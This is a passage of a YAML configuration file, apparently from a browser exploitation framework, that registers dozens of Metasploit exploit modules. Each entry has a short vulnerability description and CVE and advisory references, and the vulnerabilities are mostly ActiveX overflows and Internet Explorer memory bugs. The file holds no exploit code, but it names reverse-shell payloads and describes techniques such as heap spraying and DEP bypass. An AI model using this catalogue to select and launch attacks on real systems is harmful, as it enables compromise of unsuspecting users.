2010-3747 + - - OSVDB + - "68673" + - - BID + - "44144" + - - URL + - http://www.zerodayinitiative.com/advisories/ZDI-10-210/ + - - URL + - http://service.real.com/realplayer/security/10152010_player/en/ + path: extensions/metasploit/ + class: Msf_module +msf_novelliprint_target_frame: + enable: true + msf: true + msf_key: windows/browser/novelliprint_target_frame + name: Novell iPrint Client ActiveX Control target-frame Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a stack buffer overflow in Novell iPrint Client 5.30. When\n\ + \t\t\t\tpassing an overly long string via the \"target-frame\" parameter to ienipp.ocx\n\ + \t\t\t\tan attacker can execute arbitrary code.\n\n\ + \t\t\t\tNOTE: The \"operation\" variable must be set to a valid command in order to reach this\n\ + \t\t\t\tvulnerability.\n\ + \t\t\t" + authors: + - - CVE + - 2009-1568 + - - BID + - "37242" + - - OSVDB + - "60803" + - - URL + - http://secunia.com/advisories/37169/ + path: extensions/metasploit/ + class: Msf_module +msf_roxio_cineplayer: + enable: true + msf: true + msf_key: windows/browser/roxio_cineplayer + name: Roxio CinePlayer ActiveX Control Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack-based buffer overflow in SonicPlayer ActiveX\n\ + \t\t\t\tcontrol (SonicMediaPlayer.dll) 3.0.0.1 installed by Roxio CinePlayer 3.2.\n\ + \t\t\t\tBy setting an overly long value to 'DiskType', an attacker can overrun\n\ + \t\t\t\ta buffer and execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2007-1559 + - - OSVDB + - "34779" + - - BID + - "23412" + path: extensions/metasploit/ + class: Msf_module +msf_dxstudio_player_exec: + enable: true + msf: true + msf_key: windows/browser/dxstudio_player_exec + name: Worldweaver DX Studio Player <= 3.0.29 shell.execute() Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a command execution vulnerability within the\n\ + \t\t\t\tDX Studio Player from Worldweaver. The player is a browser plugin for\n\ + \t\t\t\tIE (ActiveX) and Firefox (dll). When an unsuspecting user visits a web\n\ + \t\t\t\tpage referring to a specially crafted .dxstudio document, an attacker can\n\ + \t\t\t\texecute arbitrary commands.\n\n\ + \t\t\t\tTesting was conducted using plugin version 3.0.29.0 for Firefox 2.0.0.20 and\n\ + \t\t\t\tIE 6 on Windows XP SP3. In IE, the user will be prompted if they wish to allow\n\ + \t\t\t\tthe plug-in to access local files. This prompt appears to occur only once per\n\ + \t\t\t\tserver host.\n\n\ + \t\t\t\tNOTE: This exploit uses additionally dangerous script features to write to\n\ + \t\t\t\tlocal files!\n\ + \t\t\t" + authors: + - - CVE + - 2009-2011 + - - BID + - "35273" + - - OSVDB + - "54969" + - - URL + - http://www.exploit-db.com/exploits/8922 + - - URL + - http://dxstudio.com/guide.aspx + path: extensions/metasploit/ + class: Msf_module +msf_realplayer_smil: + enable: true + msf: true + msf_key: windows/browser/realplayer_smil + name: RealNetworks RealPlayer SMIL Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in RealNetworks RealPlayer 10 and 8.\n\ + \t\t\t\tBy creating a URL link to a malicious SMIL file, a remote attacker could\n\ + \t\t\t\toverflow a buffer and execute arbitrary code.\n\ + \t\t\t\tWhen using this module, be sure to set the URIPATH with an extension of '.smil'.\n\ + \t\t\t\tThis module has been tested with RealPlayer 10 build 6.0.12.883 and RealPlayer 8\n\ + \t\t\t\tbuild 6.0.9.584.\n\ + \t\t\t" + authors: + - - CVE + - 2005-0455 + - - OSVDB + - "14305" + - - BID + - "12698" + path: extensions/metasploit/ + class: Msf_module +msf_java_ws_arginject_altjvm: + enable: true + msf: true + msf_key: windows/browser/java_ws_arginject_altjvm + name: Sun Java Web Start Plugin Command Line Argument Injection + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a flaw in the Web Start plugin component of Sun Java\n\ + \t\t\t\tWeb Start. The arguments passed to Java Web Start are not properly validated.\n\ + \t\t\t\tBy passing the lesser known -J option, an attacker can pass arbitrary options\n\ + \t\t\t\tdirectly to the Java runtime. By utilizing the -XXaltjvm option, as discussed\n\ + \t\t\t\tby Ruben Santamarta, an attacker can execute arbitrary code in the context of\n\ + \t\t\t\tan unsuspecting browser user.\n\n\ + \t\t\t\tThis vulnerability was originally discovered independently by both Ruben\n\ + \t\t\t\tSantamarta and Tavis Ormandy. Tavis reported that all versions since version\n\ + \t\t\t\t6 Update 10 \"are believed to be affected by this vulnerability.\"\n\n\ + \t\t\t\tIn order for this module to work, it must be ran as root on a server that\n\ + \t\t\t\tdoes not serve SMB. Additionally, the target host must have the WebClient\n\ + \t\t\t\tservice (WebDAV Mini-Redirector) enabled.\n\ + \t\t\t" + authors: + - - CVE + - 2010-0886 + - - OSVDB + - "63648" + - - BID + - "39346" + - - URL + - http://archives.neohapsis.com/archives/fulldisclosure/2010-04/0122.html + - - URL + - http://www.reversemode.com/index.php?option=com_content&task=view&id=67&Itemid=1 + path: extensions/metasploit/ + class: Msf_module +msf_adobe_flashplayer_flash10o: + enable: true + msf: true + msf_key: windows/browser/adobe_flashplayer_flash10o + name: Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a vulnerability in Adobe Flash Player that was discovered, and\n\ + \t\t\t\thas been exploited actively in the wild. By embedding a specially crafted .swf file,\n\ + \t\t\t\tAdobe Flash crashes due to an invalid use of an object type, which allows attackers to\n\ + \t\t\t\toverwrite a pointer in memory, and results arbitrary code execution.\n\ + \t\t\t" + authors: + - - CVE + - 2011-0611 + - - OSVDB + - "71686" + - - BID + - "47314" + - - URL + - http://www.adobe.com/support/security/bulletins/apsb11-07.html + - - URL + - http://blogs.technet.com/b/mmpc/archive/2011/04/12/analysis-of-the-cve-2011-0611-adobe-flash-player-vulnerability-exploitation.aspx + - - URL + - http://contagiodump.blogspot.com/2011/04/apr-8-cve-2011-0611-flash-player-zero.html + - - URL + - http://bugix-security.blogspot.com/2011/04/cve-2011-0611-adobe-flash-zero-day.html + - - URL + - http://secunia.com/blog/210 + path: extensions/metasploit/ + class: Msf_module +msf_ms06_067_keyframe: + enable: true + msf: true + msf_key: windows/browser/ms06_067_keyframe + name: Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a heap overflow vulnerability in the KeyFrame method of the\n\ + \t\t\t\tdirect animation ActiveX control. This is a port of the exploit implemented by\n\ + \t\t\t\tAlexander Sotirov.\n\ + \t\t\t" + authors: + - - CVE + - 2006-4777 + - - OSVDB + - "28842" + - - BID + - "20047" + - - MSB + - MS06-067 + - - URL + - https://www.blackhat.com/presentations/bh-eu-07/Sotirov/Sotirov-Source-Code.zip + path: extensions/metasploit/ + class: Msf_module +msf_trendmicro_officescan: + enable: true + msf: true + msf_key: windows/http/trendmicro_officescan + name: Trend Micro OfficeScan Remote Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Trend Micro OfficeScan\n\ + \t\t\t\tcgiChkMasterPwd.exe (running with SYSTEM privileges).\n\ + \t\t\t" + authors: + - - CVE + - 2008-1365 + - - OSVDB + - "42499" + path: extensions/metasploit/ + class: Msf_module +msf_ms11_050_mshtml_cobjectelement: + enable: true + msf: true + msf_key: windows/browser/ms11_050_mshtml_cobjectelement + name: MS11-050 IE mshtml!CObjectElement Use After Free + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a use-after-free vulnerability in Internet Explorer. The\n\ + \t\t\t\tvulnerability occurs when an invalid tag exists and other elements\n\ + \t\t\t\toverlap/cover where the object tag should be when rendered (due to their\n\ + \t\t\t\tstyles/positioning). The mshtml!CObjectElement is then freed from memory because\n\ + \t\t\t\tit is invalid. However, the mshtml!CDisplay object for the page continues to keep\n\ + \t\t\t\ta reference to the freed and attempts to call a function on it, leading\n\ + \t\t\t\tto the use-after-free.\n\n\ + \t\t\t\tPlease note that for IE 8 targets, JRE (Java Runtime Environment) is required to\n\ + \t\t\t\tbypass DEP.\n\ + \t\t\t" + authors: + - - CVE + - 2011-1260 + - - OSVDB + - "72950" + - - MSB + - MS11-050 + - - URL + - http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html + path: extensions/metasploit/ + class: Msf_module +msf_barcode_ax49: + enable: true + msf: true + msf_key: windows/browser/barcode_ax49 + name: RKD Software BarCodeAx.dll v4.9 ActiveX Remote Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a stack buffer overflow in RKD Software Barcode Application\n\ + \t\t\t\tActiveX Control 'BarCodeAx.dll'. By sending an overly long string to the BeginPrint\n\ + \t\t\t\tmethod of BarCodeAx.dll v4.9, an attacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - URL + - http://www.milw0rm.com/exploits/4094 + - - OSVDB + - "37482" + - - BID + - "24596" + - - CVE + - 2007-3435 + path: extensions/metasploit/ + class: Msf_module +msf_yahoomessenger_server: + enable: true + msf: true + msf_key: windows/browser/yahoomessenger_server + name: Yahoo! Messenger 8.1.0.249 ActiveX Control Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the Yahoo! Webcam Upload ActiveX\n\ + \t\t\t\tControl (ywcupl.dll) provided by Yahoo! Messenger version 8.1.0.249.\n\ + \t\t\t\tBy sending a overly long string to the \"Server()\" method, and then calling\n\ + \t\t\t\tthe \"Send()\" method, an attacker may be able to execute arbitrary code.\n\ + \t\t\t\tUsing the payloads \"windows/shell_bind_tcp\" and \"windows/shell_reverse_tcp\"\n\ + \t\t\t\tyield for the best results.\n\ + \t\t\t" + authors: + - - CVE + - 2007-3147 + - - OSVDB + - "37082" + - - URL + - http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063817.html + path: extensions/metasploit/ + class: Msf_module +msf_winzip_fileview: + enable: true + msf: true + msf_key: windows/browser/winzip_fileview + name: WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThe FileView ActiveX control (WZFILEVIEW.FileViewCtrl.61) could allow a\n\ + \t\t\t\tremote attacker to execute arbitrary code on the system. The control contains\n\ + \t\t\t\tseveral unsafe methods and is marked safe for scripting and safe for initialization.\n\ + \t\t\t\tA remote attacker could exploit this vulnerability to execute arbitrary code on the\n\ + \t\t\t\tvictim system. WinZip 10.0 <= Build 6667 are vulnerable.\n\ + \t\t\t" + authors: + - - CVE + - 2006-5198 + - - OSVDB + - "30433" + - - BID + - "21060" + path: extensions/metasploit/ + class: Msf_module +msf_chilkat_crypt_writefile: + enable: true + msf: true + msf_key: windows/browser/chilkat_crypt_writefile + name: Chilkat Crypt ActiveX WriteFile Unsafe Method + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module allows attackers to execute code via the 'WriteFile' unsafe method of\n\ + \t\t\t\tChilkat Software Inc's Crypt ActiveX control.\n\n\ + \t\t\t\tThis exploit is based on shinnai's exploit that uses an hcp:// protocol URI to\n\ + \t\t\t\texecute our payload immediately. However, this method requires that the victim user\n\ + \t\t\t\tbe browsing with Administrator. Additionally, this method will not work on newer\n\ + \t\t\t\tversions of Windows.\n\n\ + \t\t\t\tNOTE: This vulnerability is still unpatched. The latest version of Chilkat Crypt at\n\ + \t\t\t\tthe time of this writing includes ChilkatCrypt2.DLL version 4.4.4.0.\n\ + \t\t\t" + authors: + - - CVE + - 2008-5002 + - - OSVDB + - "49510" + - - BID + - "32073" + - - URL + - http://www.exploit-db.com/exploits/6963 + path: extensions/metasploit/ + class: Msf_module +msf_ms10_018_ie_behaviors: + enable: true + msf: true + msf_key: windows/browser/ms10_018_ie_behaviors + name: Internet Explorer DHTML Behaviors Use After Free + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a use-after-free vulnerability within the DHTML behaviors\n\ + \t\t\t\tfunctionality of Microsoft Internet Explorer versions 6 and 7. This bug was\n\ + \t\t\t\tdiscovered being used in-the-wild and was previously known as the \"iepeers\"\n\ + \t\t\t\tvulnerability. The name comes from Microsoft's suggested workaround to block\n\ + \t\t\t\taccess to the iepeers.dll file.\n\n\ + \t\t\t\tAccording to Nico Waisman, \"The bug itself is when trying to persist an object\n\ + \t\t\t\tusing the setAttribute, which end up calling VariantChangeTypeEx with both the\n\ + \t\t\t\tsource and the destination being the same variant. So if you send as a variant\n\ + \t\t\t\tan IDISPATCH the algorithm will try to do a VariantClear of the destination before\n\ + \t\t\t\tusing it. This will end up on a call to PlainRelease which deref the reference\n\ + \t\t\t\tand clean the object.\"\n\n\ + \t\t\t\tNOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.\n\ + \t\t\t" + authors: + - - CVE + - 2010-0806 + - - OSVDB + - "62810" + - - BID + - "38615" + - - URL + - http://www.microsoft.com/technet/security/advisory/981374.mspx + - - URL + - http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/ + - - URL + - http://eticanicomana.blogspot.com/2010/03/aleatory-persitent-threat.html + - - MSB + - MS10-018 + path: extensions/metasploit/ + class: Msf_module +msf_nis2004_get: + enable: true + msf: true + msf_key: windows/browser/nis2004_get + name: Symantec Norton Internet Security 2004 ActiveX Control Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the ISAlertDataCOM ActiveX\n\ + \t\t\t\tControl (ISLAert.dll) provided by Symantec Norton Internet Security 2004.\n\ + \t\t\t\tBy sending a overly long string to the \"Get()\" method, an attacker may be\n\ + \t\t\t\table to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2007-1689 + - - OSVDB + - "36164" + - - URL + - http://securityresponse.symantec.com/avcenter/security/Content/2007.05.16.html + path: extensions/metasploit/ + class: Msf_module +msf_ibmlotusdomino_dwa_uploadmodule: + enable: true + msf: true + msf_key: windows/browser/ibmlotusdomino_dwa_uploadmodule + name: IBM Lotus Domino Web Access Upload Module Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in IBM Lotus Domino Web Access Upload Module.\n\ + \t\t\t\tBy sending an overly long string to the \"General_ServerName()\" property located\n\ + \t\t\t\tin the dwa7w.dll and the inotes6w.dll control, an attacker may be able to execute\n\ + \t\t\t\tarbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2007-4474 + - - OSVDB + - "40954" + - - BID + - "26972" + - - URL + - http://milw0rm.com/exploits/4820 + path: extensions/metasploit/ + class: Msf_module +msf_hp_loadrunner_addfolder: + enable: true + msf: true + msf_key: windows/browser/hp_loadrunner_addfolder + name: HP LoadRunner 9.0 ActiveX AddFolder Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Persits Software Inc's\n\ + \t\t\t\tXUpload ActiveX control(version 2.1.0.1) thats included in HP LoadRunner 9.0.\n\ + \t\t\t\tBy passing an overly long string to the AddFolder method, an attacker may be\n\ + \t\t\t\table to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2007-6530 + - - OSVDB + - "39901" + - - BID + - "27025" + - - URL + - http://lists.grok.org.uk/pipermail/full-disclosure/2007-December/059296.html + path: extensions/metasploit/ + class: Msf_module +msf_ea_checkrequirements: + enable: true + msf: true + msf_key: windows/browser/ea_checkrequirements + name: Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Electronic Arts SnoopyCtrl\n\ + \t\t\t\tActiveX Control (NPSnpy.dll 1.1.0.36. When sending a overly long\n\ + \t\t\t\tstring to the CheckRequirements() method, an attacker may be able\n\ + \t\t\t\tto execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2007-4466 + - - OSVDB + - "37723" + path: extensions/metasploit/ + class: Msf_module +msf_ms06_057_webview_setslice: + enable: true + msf: true + msf_key: windows/browser/ms06_057_webview_setslice + name: Internet Explorer WebViewFolderIcon setSlice() Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a flaw in the WebViewFolderIcon ActiveX control\n\ + \t\t\tincluded with Windows 2000, Windows XP, and Windows 2003. This flaw was published\n\ + \t\t\tduring the Month of Browser Bugs project (MoBB #18).\n\ + \t\t\t" + authors: + - - CVE + - 2006-3730 + - - OSVDB + - "27110" + - - MSB + - MS06-057 + - - BID + - "19030" + - - URL + - http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html + path: extensions/metasploit/ + class: Msf_module +msf_sonicwall_addrouteentry: + enable: true + msf: true + msf_key: windows/browser/sonicwall_addrouteentry + name: SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in SonicWall SSL-VPN NetExtender.\n\ + \t\t\t\tBy sending an overly long string to the \"AddRouteEntry()\" method located\n\ + \t\t\t\tin the NELaunchX.dll (1.0.0.26) Control, an attacker may be able to execute\n\ + \t\t\t\tarbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2007-5603 + - - OSVDB + - "39069" + - - URL + - http://www.sec-consult.com/303.html + path: extensions/metasploit/ + class: Msf_module +msf_trendmicro_extsetowner: + enable: true + msf: true + msf_key: windows/browser/trendmicro_extsetowner + name: Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a remote code execution vulnerability in Trend Micro\n\ + \t\t\t\tInternet Security Pro 2010 ActiveX.\n\ + \t\t\t\tWhen sending an invalid pointer to the extSetOwner() function of UfPBCtrl.dll\n\ + \t\t\t\tan attacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2010-3189 + - - OSVDB + - "67561" + - - URL + - http://www.zerodayinitiative.com/advisories/ZDI-10-165/ + - - URL + - http://www.exploit-db.com/exploits/14878/ + path: extensions/metasploit/ + class: Msf_module +msf_mcafee_mcsubmgr_vsprintf: + enable: true + msf: true + msf_key: windows/browser/mcafee_mcsubmgr_vsprintf + name: McAfee Subscription Manager Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a flaw in the McAfee Subscription Manager ActiveX control.\n\ + \t\t\t\tDue to an unsafe use of vsprintf, it is possible to trigger a stack buffer overflow by\n\ + \t\t\t\tpassing a large string to one of the COM-exposed routines, such as IsAppExpired.\n\ + \t\t\t\tThis vulnerability was discovered by Karl Lynn of eEye.\n\ + \t\t\t" + authors: + - - CVE + - 2006-3961 + - - OSVDB + - "27698" + - - BID + - "19265" + - - URL + - http://lists.grok.org.uk/pipermail/full-disclosure/2006-August/048565.html + path: extensions/metasploit/ + class: Msf_module +msf_ms09_043_owc_htmlurl: + enable: true + msf: true + msf_key: windows/browser/ms09_043_owc_htmlurl + name: Microsoft OWC Spreadsheet HTMLURL Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in Microsoft's Office Web Components.\n\ + \t\t\t\tWhen passing an overly long string as the \"HTMLURL\" parameter an attacker can\n\ + \t\t\t\texecute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2009-1534 + - - OSVDB + - "56916" + - - BID + - "35992" + - - MSB + - MS09-043 + - - URL + - http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=819 + path: extensions/metasploit/ + class: Msf_module +msf_communicrypt_mail_activex: + enable: true + msf: true + msf_key: windows/browser/communicrypt_mail_activex + name: CommuniCrypt Mail 1.16 SMTP ActiveX Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the ANSMTP.dll/AOSMTP.dll\n\ + \t\t\t\tActiveX Control provided by CommuniCrypt Mail 1.16. By sending a overly\n\ + \t\t\t\tlong string to the \"AddAttachments()\" method, an attacker may be able to\n\ + \t\t\t\texecute arbitrary code.\n\ + \t\t\t" + authors: + - - OSVDB + - "64839" + - - URL + - http://www.exploit-db.com/exploits/12663 + path: extensions/metasploit/ + class: Msf_module +msf_gom_openurl: + enable: true + msf: true + msf_key: windows/browser/gom_openurl + name: GOM Player ActiveX Control Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in GOM Player 2.1.6.3499.\n\ + \t\t\t\tBy sending an overly long string to the \"OpenUrl()\" method located\n\ + \t\t\t\tin the GomWeb3.dll Control, an attacker may be able to execute\n\ + \t\t\t\tarbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2007-5779 + - - OSVDB + - "38282" + - - URL + - http://secunia.com/advisories/27418/ + path: extensions/metasploit/ + class: Msf_module +msf_facebook_extractiptc: + enable: true + msf: true + msf_key: windows/browser/facebook_extractiptc + name: Facebook Photo Uploader 4 ActiveX Control Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Facebook Photo Uploader 4.\n\ + \t\t\t\tBy sending an overly long string to the \"ExtractIptc()\" property located\n\ + \t\t\t\tin the ImageUploader4.ocx (4.5.57.0) Control, an attacker may be able to execute\n\ + \t\t\t\tarbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2008-5711 + - - OSVDB + - "41073" + - - BID + - "27534" + - - URL + - http://milw0rm.com/exploits/5049 + path: extensions/metasploit/ + class: Msf_module +msf_ask_shortformat: + enable: true + msf: true + msf_key: windows/browser/ask_shortformat + name: Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Ask.com Toolbar 4.0.2.53.\n\ + \t\t\t\tAn attacker may be able to excute arbitrary code by sending an overly\n\ + \t\t\t\tlong string to the \"ShortFormat()\" method in askbar.dll.\n\ + \t\t\t" + authors: + - - CVE + - 2007-5107 + - - OSVDB + - "37735" + - - URL + - http://wslabi.com/wabisabilabi/showBidInfo.do?code=ZD-00000148 + path: extensions/metasploit/ + class: Msf_module +msf_ibmegath_getxmlvalue: + enable: true + msf: true + msf_key: windows/browser/ibmegath_getxmlvalue + name: IBM Access Support ActiveX Control Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in IBM Access Support. When\n\ + \t\t\t\tsending an overly long string to the GetXMLValue() method of IbmEgath.dll\n\ + \t\t\t\t(3.20.284.0) an attacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2009-0215 + - - OSVDB + - "52958" + - - BID + - "34228" + path: extensions/metasploit/ + class: Msf_module +msf_apple_quicktime_smil_debug: + enable: true + msf: true + msf_key: windows/browser/apple_quicktime_smil_debug + name: Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in Apple QuickTime\n\ + \t\t\t\t7.6.6. When processing a malformed SMIL uri, a stack-based buffer\n\ + \t\t\t\toverflow can occur when logging an error message.\n\ + \t\t\t" + authors: + - - CVE + - 2010-1799 + - - OSVDB + - "66636" + - - BID + - "41962" + - - URL + - http://secunia.com/advisories/40729/ + - - URL + - http://support.apple.com/kb/HT4290 + path: extensions/metasploit/ + class: Msf_module +msf_novelliprint_executerequest_dbg: + enable: true + msf: true + msf_key: windows/browser/novelliprint_executerequest_dbg + name: Novell iPrint Client ActiveX Control ExecuteRequest debug Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack-based buffer overflow in Novell iPrint Client 5.40.\n\ + \t\t\t\tWhen sending an overly long string to the 'debug' parameter in ExecuteRequest()\n\ + \t\t\t\tproperty of ienipp.ocx an attacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2010-3106 + - - OSVDB + - "66960" + - - URL + - http://dvlabs.tippingpoint.com/advisory/TPTI-10-06 + - - URL + - http://www.exploit-db.com/exploits/15001/ + path: extensions/metasploit/ + class: Msf_module +msf_enjoysapgui_comp_download: + enable: true + msf: true + msf_key: windows/browser/enjoysapgui_comp_download + name: EnjoySAP SAP GUI ActiveX Control Arbitrary File Download + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module allows remote attackers to place arbitrary files on a users file system\n\ + \t\t\t\tby abusing the \"Comp_Download\" method in the SAP KWEdit ActiveX Control (kwedit.dll 6400.1.1.41).\n\ + \t\t\t" + authors: + - - CVE + - 2008-4830 + - - OSVDB + - "53680" + - - URL + - http://dsecrg.com/files/pub/pdf/HITB%20-%20Attacking%20SAP%20Users%20with%20Sapsploit.pdf + path: extensions/metasploit/ + class: Msf_module +msf_ms08_078_xml_corruption: + enable: true + msf: true + msf_key: windows/browser/ms08_078_xml_corruption + name: Internet Explorer Data Binding Memory Corruption + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a vulnerability in the data binding feature of Internet\n\ + \t\t\tExplorer. In order to execute code reliably, this module uses the .NET DLL\n\ + \t\t\tmemory technique pioneered by Alexander Sotirov and Mark Dowd. This method is\n\ + \t\t\tused to create a fake vtable at a known location with all methods pointing\n\ + \t\t\tto our payload. Since the .text segment of the .NET DLL is non-writable, a\n\ + \t\t\tprefixed code stub is used to copy the payload into a new memory segment and\n\ + \t\t\tcontinue execution from there.\n\ + \t\t\t" + authors: + - - CVE + - 2008-4844 + - - OSVDB + - "50622" + - - BID + - "32721" + - - MSB + - MS08-078 + - - URL + - http://www.microsoft.com/technet/security/advisory/961051.mspx + - - URL + - http://taossa.com/archive/bh08sotirovdowd.pdf + path: extensions/metasploit/ + class: Msf_module +msf_ms10_018_ie_tabular_activex: + enable: true + msf: true + msf_key: windows/browser/ms10_018_ie_tabular_activex + name: Internet Explorer Tabular Data Control ActiveX Memory Corruption + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a memory corruption vulnerability in the Internet Explorer\n\ + \t\t\t\tTabular Data ActiveX Control. Microsoft reports that version 5.01 and 6 of Internet\n\ + \t\t\t\tExplorer are vulnerable.\n\n\ + \t\t\t\tBy specifying a long value as the \"DataURL\" parameter to this control, it is possible\n\ + \t\t\t\tto write a NUL byte outside the bounds of an array. By targeting control flow data\n\ + \t\t\t\ton the stack, an attacker can execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2010-0805 + - - OSVDB + - "63329" + - - BID + - "39025" + - - URL + - http://www.zerodayinitiative.com/advisories/ZDI-10-034 + - - MSB + - MS10-018 + path: extensions/metasploit/ + class: Msf_module +msf_adobe_flashplayer_newfunction: + enable: true + msf: true + msf_key: windows/fileformat/adobe_flashplayer_newfunction + name: Adobe Flash Player "newfunction" Invalid Pointer Use + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a vulnerability in the DoABC tag handling within\n\ + \t\t\t\tversions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also\n\ + \t\t\t\tvulnerable, as are any other applications that may embed Flash player.\n\n\ + \t\t\t\tArbitrary code execution is achieved by embedding a specially crafted Flash\n\ + \t\t\t\tmovie into a PDF document. An AcroJS heap spray is used in order to ensure\n\ + \t\t\t\tthat the memory used by the invalid pointer issue is controlled.\n\n\ + \t\t\t\tNOTE: This module uses a similar DEP bypass method to that used within the\n\ + \t\t\t\tadobe_libtiff module. This method is unlikely to work across various\n\ + \t\t\t\tWindows versions due a the hardcoded syscall number.\n\ + \t\t\t" + authors: + - - CVE + - 2010-1297 + - - OSVDB + - "65141" + - - BID + - "40586" + - - URL + - http://www.adobe.com/support/security/advisories/apsa10-01.html + - - URL + - http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/ + path: extensions/metasploit/ + class: Msf_module +msf_verypdf_pdfview: + enable: true + msf: true + msf_key: windows/browser/verypdf_pdfview + name: VeryPDF PDFView OCX ActiveX OpenPDF Heap Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThe VeryPDF PDFView ActiveX control is prone to a heap buffer-overflow\n\ + \t\t\t\tbecause it fails to properly bounds-check user-supplied data before copying\n\ + \t\t\t\tit into an insufficiently sized memory buffer. An attacker can exploit this issue\n\ + \t\t\t\tto execute arbitrary code within the context of the affected application.\n\ + \t\t\t" + authors: + - - CVE + - 2008-5492 + - - OSVDB + - "49871" + - - BID + - "32313" + path: extensions/metasploit/ + class: Msf_module +msf_symantec_appstream_unsafe: + enable: true + msf: true + msf_key: windows/browser/symantec_appstream_unsafe + name: Symantec AppStream LaunchObj ActiveX Control Arbitrary File Download and Execute + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a vulnerability in Symantec AppStream Client 5.x. The vulnerability\n\ + \t\t\t\tis in the LaunchObj ActiveX control (launcher.dll 5.1.0.82) containing the \"installAppMgr()\"\n\ + \t\t\t\tmethod. The insecure method can be exploited to download and execute arbitrary files in the\n\ + \t\t\t\tcontext of the currently logged-on user.\n\ + \t\t\t" + authors: + - - CVE + - 2008-4388 + - - OSVDB + - "51410" + path: extensions/metasploit/ + class: Msf_module +msf_realplayer_import: + enable: true + msf: true + msf_key: windows/browser/realplayer_import + name: RealPlayer ierpplug.dll ActiveX Control Playlist Name Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in RealOne Player V2 Gold Build 6.0.11.853 and\n\ + \t\t\t\tRealPlayer 10.5 Build 6.0.12.1483. By sending an overly long string to the \"Import()\"\n\ + \t\t\t\tmethod, an attacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2007-5601 + - - OSVDB + - "41430" + - - BID + - "26130" + path: extensions/metasploit/ + class: Msf_module +msf_ms03_020_ie_objecttype: + enable: true + msf: true + msf_key: windows/browser/ms03_020_ie_objecttype + name: MS03-020 Internet Explorer Object Type + category: 